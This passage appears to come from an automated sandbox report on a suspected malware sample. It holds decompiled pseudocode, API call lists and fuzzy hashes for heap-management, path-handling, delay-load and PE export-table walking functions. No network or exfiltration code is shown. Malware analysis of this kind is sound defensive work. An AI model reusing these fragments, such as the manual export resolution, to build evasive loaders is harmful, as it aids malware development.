					 *0x40548c =  *0x40548c & 0x00000000;
				} else {
					_t17 = _v8;
					_t21 = __imp__GetLongPathNameW;
					_t10 =  *_t21(_t17, _t8, _t8); // executed
					_t24 = _t10;
					if(_t24 == 0) {
						L4:
						 *0x40548c = _t17;
					} else {
						_t5 = _t24 + 2; // 0x2
						_t12 = E00401046(_t24 + _t5);
						 *0x40548c = _t12;
						if(_t12 == 0) {
							goto L4;
						} else {
							 *_t21(_t17, _t12, _t24); // executed
							E0040105B(_t17);
						}
					}
				}
				return _v12;
			}

0x00401c12
0x00401c13
0x00401c23
0x00401c2a
0x00401c2d
0x00401c6b
0x00401c2f
0x00401c2f
0x00401c32
0x00401c3b
0x00401c3d
0x00401c41
0x00401c63
0x00401c63
0x00401c43
0x00401c43
0x00401c48
0x00401c4f
0x00401c54
0x00000000
0x00401c56
0x00401c59
0x00401c5c
0x00401c5c
0x00401c54
0x00401c41
0x00401c79

APIs

Part of subcall function 00402685: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026AB
Part of subcall function 00402685: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,767F1218,00000000,?,?,00401C28,?,00000001,767F1218,00000000), ref: 004026B3
Part of subcall function 00402685: GetLastError.KERNEL32(?,?,00401C28,?,00000001,767F1218,00000000,?,?,?,?,00401196,?,00000000), ref: 004026F1

GetLongPathNameW.KERNEL32 ref: 00401C3B

Part of subcall function 00401046: HeapAlloc.KERNEL32(00000000,00000000,004028D9,?,00000000,0000000C,?,?,?,?,00401091,?,?,736C6E70,767F1218,0000000C), ref: 00401052

GetLongPathNameW.KERNEL32 ref: 00401C59

Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,00402908), ref: 00401067

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Name$FileHeapLongModulePath$AllocErrorFreeLast
String ID:
API String ID: 2000041143-0
Opcode ID: fbca7b0c18db94ee543cb269b1779b2661e24f7169b4c19bb2f4ccf1596d5389
Instruction ID: d3e87ff06768e6a7e1fda7decc6c686394161edc76869d1cb1342030556b486c
Opcode Fuzzy Hash: fbca7b0c18db94ee543cb269b1779b2661e24f7169b4c19bb2f4ccf1596d5389
Instruction Fuzzy Hash: 27F081B1500604BFE710AB66DDC5EBF7AACDB45355B000036F901F62A1E278DD448F78

Function 0040F98F, Relevance: 3.0, APIs: 2, Instructions: 46

APIs

GetModuleHandleA.KERNEL32(0041804C,?,?,0040EFA6), ref: 0040F9A0
InterlockedIncrement.KERNEL32(0042C4A8), ref: 0040F9FB

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: HandleIncrementInterlockedModule
String ID:
API String ID: 4046927871-0
Opcode ID: 181cf96f9878aa2d40397fe430bf17a031a9cbf11847fb4acf0a5ae2794ba46b
Instruction ID: fb9e327bc4e86ad3706c899d9e65884dd5987718e2b76837441fe1fa9022f41c
Opcode Fuzzy Hash: 181cf96f9878aa2d40397fe430bf17a031a9cbf11847fb4acf0a5ae2794ba46b
Instruction Fuzzy Hash: CB115E71940705DFD720AF7AD845B9ABBE0AF48304F10853EE599A3691CB78A9448F68

Function 002D2668, Relevance: 3.0, APIs: 2, Instructions: 39memory

APIs

SysAllocString.OLEAUT32(?), ref: 002D2682

Part of subcall function 002D2495: SysFreeString.OLEAUT32(002DCA98,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D256C
Part of subcall function 002D2495: SysFreeString.OLEAUT32(00000000,?,?,?,002D2663,?,80000001,002DCA98,002DC268,00000000,002DC0DC,?,00000000,00000000), ref: 002D2576

SysFreeString.OLEAUT32(00000000), ref: 002D26B9

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 09021b1d5bbeb9ab137656c55f8afd0c4bc6fffd76df73f091f43d12e320110c
Instruction ID: d751d19ae2d945eb4ca0127a847b6731be66642d5a531fb01cda5f497c2d90f1
Opcode Fuzzy Hash: 09021b1d5bbeb9ab137656c55f8afd0c4bc6fffd76df73f091f43d12e320110c
Instruction Fuzzy Hash: 0EF0A472921209BBCB115F68DC0999F7B78EF58311B104022FD01B1220D370CD2896E2

Function 0040ED3B, Relevance: 3.0, APIs: 2, Instructions: 28memory

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040ED4C

Part of subcall function 0040E1E1: RtlAllocateHeap.NTDLL(00000000,00000140), ref: 0040E1EE

HeapDestroy.KERNEL32 ref: 0040ED82

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocateCreateDestroy
String ID:
API String ID: 316229882-0
Opcode ID: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
Instruction ID: 180c67e53c48d7ee7fcfb374972431bf06498a8ed9b27042e88693ef51ef3f03
Opcode Fuzzy Hash: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
Instruction Fuzzy Hash: 0AE09B3165D303BADB017B725D057273694EB00346F018C77F405D42E0E7788560591D

Function 0040ED3B, Relevance: 3.0, APIs: 2, Instructions: 28
memory

C-Code - Quality: 100%

			E0040ED3B(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t15 = __edx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x436214 = _t6;
				if(_t6 != 0) {
					_t7 = E0040ECE0(__ebx, _t15, __edi, __eflags);
					__eflags = _t7 - 3;
					 *0x436be0 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E0040E1E1(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x436214);
							 *0x436214 =  *0x436214 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x0040ed3b
0x0040ed4c
0x0040ed54
0x0040ed59
0x0040ed5e
0x0040ed63
0x0040ed66
0x0040ed6b
0x0040ed91
0x0040ed93
0x0040ed94
0x0040ed6d
0x0040ed72
0x0040ed77
0x0040ed7a
0x00000000
0x0040ed7c
0x0040ed82
0x0040ed88
0x00000000
0x0040ed88
0x0040ed7a
0x0040ed5b
0x0040ed5b
0x0040ed5d
0x0040ed5d

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040C908,00000001), ref: 0040ED4C

Part of subcall function 0040E1E1: HeapAlloc.KERNEL32(00000000,00000140,0040ED77,000003F8), ref: 0040E1EE

HeapDestroy.KERNEL32 ref: 0040ED82

Memory Dump Source

Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
Instruction ID: 180c67e53c48d7ee7fcfb374972431bf06498a8ed9b27042e88693ef51ef3f03
Opcode Fuzzy Hash: bd0873f8e6bb77115fc3093740917aeb563906a716937f92d067742f24ba8ebf
Instruction Fuzzy Hash: 0AE09B3165D303BADB017B725D057273694EB00346F018C77F405D42E0E7788560591D

Function 002D1129, Relevance: 3.0, APIs: 2, Instructions: 26

APIs

InterlockedIncrement.KERNEL32(002DB1F4), ref: 002D113E

Part of subcall function 002D102A: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002D1037
Part of subcall function 002D102A: GetTickCount.KERNEL32 ref: 002D104E
Part of subcall function 002D102A: GetModuleHandleA.KERNEL32(002DC09F,?,?,?), ref: 002D1089
Part of subcall function 002D102A: GetProcAddress.KERNEL32(00000000,002DC8D6,?,?,?), ref: 002D109A
Part of subcall function 002D102A: IsWow64Process.KERNELBASE(002DB208,?,?,?,?), ref: 002D10B2

InterlockedDecrement.KERNEL32(002DB1F4), ref: 002D115E

Part of subcall function 002D10D5: SetEvent.KERNEL32(002DB220), ref: 002D10E0
Part of subcall function 002D10D5: SleepEx.KERNEL32(00000064,00000001), ref: 002D10EF
Part of subcall function 002D10D5: CloseHandle.KERNEL32(002DB220), ref: 002D1110
Part of subcall function 002D10D5: HeapDestroy.KERNEL32(002DB1F0), ref: 002D1120

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: HandleHeapInterlocked$AddressCloseCountCreateDecrementDestroyEventIncrementModuleProcProcessSleepTickWow64
String ID:
API String ID: 3503610136-0
Opcode ID: 2de2a2ba4a3a166a871c01a05a9bf37b6fac0e232b15b0501cc804e00cfb9113
Instruction ID: 05ffe57c944f14598614bf24c00286ea153ca196c9c0fdb77cf42fe46d6cee53
Opcode Fuzzy Hash: 2de2a2ba4a3a166a871c01a05a9bf37b6fac0e232b15b0501cc804e00cfb9113
Instruction Fuzzy Hash: F5E04F21634173B79B212F659C09F6BA6509B10BC1B018517FAC8D1B90D752CCB086A2

Function 0040E1B8, Relevance: 3.0, APIs: 2, Instructions: 13libraryloader

APIs

GetModuleHandleA.KERNEL32(00417A74), ref: 0040E1BD
GetProcAddress.KERNEL32(00000000,00417A58), ref: 0040E1CD

Memory Dump Source

Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-0
Opcode ID: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
Instruction ID: 81a772609b1be3753ee91d77cf381401c8db6a6cdce0ee8bcfb7c7911c54f1bb
Opcode Fuzzy Hash: 5c8b0a2a3fd0743bf04907dc865b83f30a7debde992b96672e13496cb7125439
Instruction Fuzzy Hash: 8AC012307CC302AADA102BB20C09B9BB9782F09B82F208C726909E91C1CA7CC120816D

Function 004029CC, Relevance: 2.6, APIs: 2, Instructions: 107
string

C-Code - Quality: 86%

			E004029CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t56;
				intOrPtr* _t57;
				intOrPtr _t60;
				signed int _t61;
				CHAR* _t65;
				intOrPtr* _t77;
				intOrPtr _t79;
				CHAR* _t80;
				intOrPtr _t85;
				signed int _t88;
				signed short* _t90;
				void* _t94;
				void* _t95;
				void* _t108;

				_push(0x2c);
				_push(0x404140);
				E00402F20(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t95 - 0x24)) = 0;
				 *(_t95 - 4) = 0;
				_t85 =  *((intOrPtr*)(_t95 + 8));
				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
				if( *((short*)(_t56 + 4)) != 0x14c) {
					_t57 = _t56 + 0x88;
				} else {
					_t57 = _t56 + 0x78;
				}
				_t94 =  *_t57 + _t85;
				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
					L27:
					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
					return E00402F5B( *((intOrPtr*)(_t95 - 0x24)));
				} else {
					_t60 =  *((intOrPtr*)(_t94 + 0x14));
					if(_t60 != 0) {
						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
						_t88 =  *(_t95 + 0xc);
						 *(_t95 - 0x20) = _t88;
						if(_t88 == 0 || _t88 > 0xffff) {
							 *(_t95 - 0x20) = 0;
							_t60 =  *((intOrPtr*)(_t94 + 0x18));
						}
						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
							_t61 =  *(_t95 - 0x20);
							if(_t61 != 0) {
								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
							}
							goto L27;
						}
						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
						 *(_t95 - 0x3c) = _t90;
						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
							if( *(_t95 - 0x20) == 0) {
								_t65 =  *_t77 + _t85;
								 *(_t95 - 0x30) = _t65;
								_t80 =  *(_t95 + 0xc);
								if(_t80 == 0) {
									E00402BEA(lstrlenA(_t65),  *(_t95 - 0x30));
									L19:
									if(_t108 == 0) {
										 *(_t95 - 0x1c) = 1;
									}
									L21:
									if( *(_t95 - 0x1c) == 0) {
										_t77 = _t77 + 4;
										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
										_t90 =  &(_t90[1]);
										 *(_t95 - 0x3c) = _t90;
										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
										_t85 =  *((intOrPtr*)(_t95 + 8));
										continue;
									}
									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
									if(0 != 0) {
										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
									}
									goto L27;
								}
								if( *_t65 !=  *_t80) {
									goto L21;
								}
								lstrcmpA(_t65, _t80); // executed
								goto L19;
							}
							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
							goto L19;
						}
					}
					goto L27;
				}
			}

0x004029cc
0x004029ce
0x004029d3
0x004029da
0x004029dd
0x004029e0
0x004029e6
0x004029ee
0x004029f5
0x004029f0
0x004029f0
0x004029f0
0x004029fc
0x00402a00
0x00402b0f
0x00402b0f
0x00402b1b
0x00402a18
0x00402a18
0x00402a1d
0x00402a26
0x00402a28
0x00402a2b
0x00402a2e
0x00402a33
0x00402a3d
0x00402a40
0x00402a40
0x00402a43
0x00402a49
0x00402af4
0x00402af9
0x00402aff
0x00402aff
0x00000000
0x00402af9
0x00402a52
0x00402a54
0x00402a5a
0x00402a5c
0x00402a5f
0x00402a63
0x00402a6f
0x00402a77
0x00402a86
0x00402a88
0x00402a8b
0x00402a90
0x00402aae
0x00402ab6
0x00402ab6
0x00402ab8
0x00402ab8
0x00402abf
0x00402ac3
0x00402ade
0x00402ae1
0x00402ae5
0x00402ae6
0x00402ae9
0x00402aec
0x00000000
0x00402aec
0x00402ace
0x00402ad3
0x00402ada
0x00402ada
0x00000000
0x00402ad3
0x00402a96
0x00000000
0x00000000
0x00402a9a
0x00000000
0x00402aa0
0x00402a7f
0x00000000
0x00402a7f
0x00402a63
0x00000000
0x00402a1d

APIs

lstrcmpA.KERNEL32(?,?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402A9A
lstrlenA.KERNEL32(?,00404140,0000002C,00402845,76EA0000,00000000,76EC0C30,?,?,00401187,?,00000000), ref: 00402AA5

Memory Dump Source

Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: lstrcmplstrlen
String ID:
API String ID: 898299967-0
Opcode ID: 359c905574d0e12692396af4256237419557066a94b145a0bfe448bece07f85a
Instruction ID: 40c428d3c91ca5d49947b9e85c7df197b014cf7646aa79326ee3b1aaee03fb73
Opcode Fuzzy Hash: 359c905574d0e12692396af4256237419557066a94b145a0bfe448bece07f85a
Instruction Fuzzy Hash: 51410671A00205CFCB24CF95CA886AEB7B1BF48314F18857AE406B77D1DBB8A945DF58

Function 002905DB, Relevance: 1.6, APIs: 1, Instructions: 56libraryloader

APIs

GetProcAddress.KERNELBASE(?,?,?,00290327,2B14D0EE,?), ref: 00290639

Memory Dump Source

Source File: 00000001.00000002.3011296226.0000000000290000.00000040.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_290000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction ID: 66bb89836946217719fa1830f2b9e7a8747c0fc1b59c0e83c515c5d7d9fa2e60
Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction Fuzzy Hash: 5A11187661021AAFDF10CF19C8C0A6A77A8FF9476871A8065ED59DB302D770FD21CB90

Function 002D9233, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: d887a1b9b9a293fb6643796ec88173bc19549d331bda4141dc30bae08f8dfd00
Instruction ID: d81a97c829a48bbb7a31155ba5374c7c5e92687da60c171e40c76ce8b8895330
Opcode Fuzzy Hash: d887a1b9b9a293fb6643796ec88173bc19549d331bda4141dc30bae08f8dfd00
Instruction Fuzzy Hash: 68B09281279001EC214852191A06C3B011CC180B51360801BB404C0340E8805D624132

Function 002D8B60, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B57

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 08633c5ff66e38542d1e9167bdb95828e41a1c9f5572b34cd27729c5f1ffe65b
Instruction ID: 37d8ee192c77179e7ddd16b87eaa73e4ba693ce94fbcab49fe494029176d988a
Opcode Fuzzy Hash: 08633c5ff66e38542d1e9167bdb95828e41a1c9f5572b34cd27729c5f1ffe65b
Instruction Fuzzy Hash: 1BB011C22BA000FC3288A20C2E23C3B020CC0C2F28330802FF808CA380EE80AC328032

Function 002D8B45, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8B57

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: f2145e0eff17c266d6205fdb0be8f45e93ddb4912b7fc7b46ac561554ab2a9ef
Instruction ID: a749a5767d2f7bed7b6f7b7c8a4bf29287038ee66957973964a8bff4ddc42456
Opcode Fuzzy Hash: f2145e0eff17c266d6205fdb0be8f45e93ddb4912b7fc7b46ac561554ab2a9ef
Instruction Fuzzy Hash: E5B011C2ABA002FC3208220C2E2BC3B020CC0C0F28330882FF800C03C0EE80AC328032

Function 002D91F7, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: a6f4919016f9d4e1ed599234c65eefd1822f222d5b524256dadd4dfcb20af29c
Instruction ID: 1e842914e79a10eb9fc40c6bc6dac86f227d2bbefd0535c0e2f203a5ff104357
Opcode Fuzzy Hash: a6f4919016f9d4e1ed599234c65eefd1822f222d5b524256dadd4dfcb20af29c
Instruction Fuzzy Hash: A6B0128127D001FC3148521D1E06D37011CC1C0B51370C01FF404C0340F8C05C714133

Function 002D8AC9, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: b46da73b24451c06b1d41b79e63a69688d0c7256f8c829bcdbf4679539e3ce99
Instruction ID: b5818cf1dbbd8b681e4abb75581fb8e6a31de7a2c8500f11b92cd033259366e4
Opcode Fuzzy Hash: b46da73b24451c06b1d41b79e63a69688d0c7256f8c829bcdbf4679539e3ce99
Instruction Fuzzy Hash: 91B0128137D004FC3108524B1D1AD37010CD1C5B11330801FF801C5380FC802C314132

Function 002D8AD3, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D8AC0

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
Part of subcall function 002D8CBC: LoadLibraryA.KERNEL32(?), ref: 002D8DB2
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8DBE
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 002D8DF1
Part of subcall function 002D8CBC: InterlockedExchange.KERNEL32(?,00000000), ref: 002D8E03
Part of subcall function 002D8CBC: LocalAlloc.KERNEL32(00000040,00000008), ref: 002D8E17
Part of subcall function 002D8CBC: FreeLibrary.KERNEL32(00000000), ref: 002D8E34
Part of subcall function 002D8CBC: GetProcAddress.KERNEL32(?,?), ref: 002D8E89
Part of subcall function 002D8CBC: GetLastError.KERNEL32 ref: 002D8E95
Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 002D8EC7

Memory Dump Source

Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
String ID:
API String ID: 1405810187-0
Opcode ID: 80056d24e124bcde898aeb04738165ee032a464c830b16543d38caa8aade2a2f
Instruction ID: 4b0e871a9492406ebb0dcff34c5e352ac9d014de3ca0447890464f8e4903671c
Opcode Fuzzy Hash: 80056d24e124bcde898aeb04738165ee032a464c830b16543d38caa8aade2a2f
Instruction Fuzzy Hash: FDB0128527D000FC3208524A1D06C37010CC1C2B11330C01FFC01C5340EC812C314132

Function 002D922E, Relevance: 1.5, APIs: 1, Instructions: 9

APIs

___delayLoadHelper2@8.DELAYIMP ref: 002D91EE

Part of subcall function 002D8CBC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002D8D35
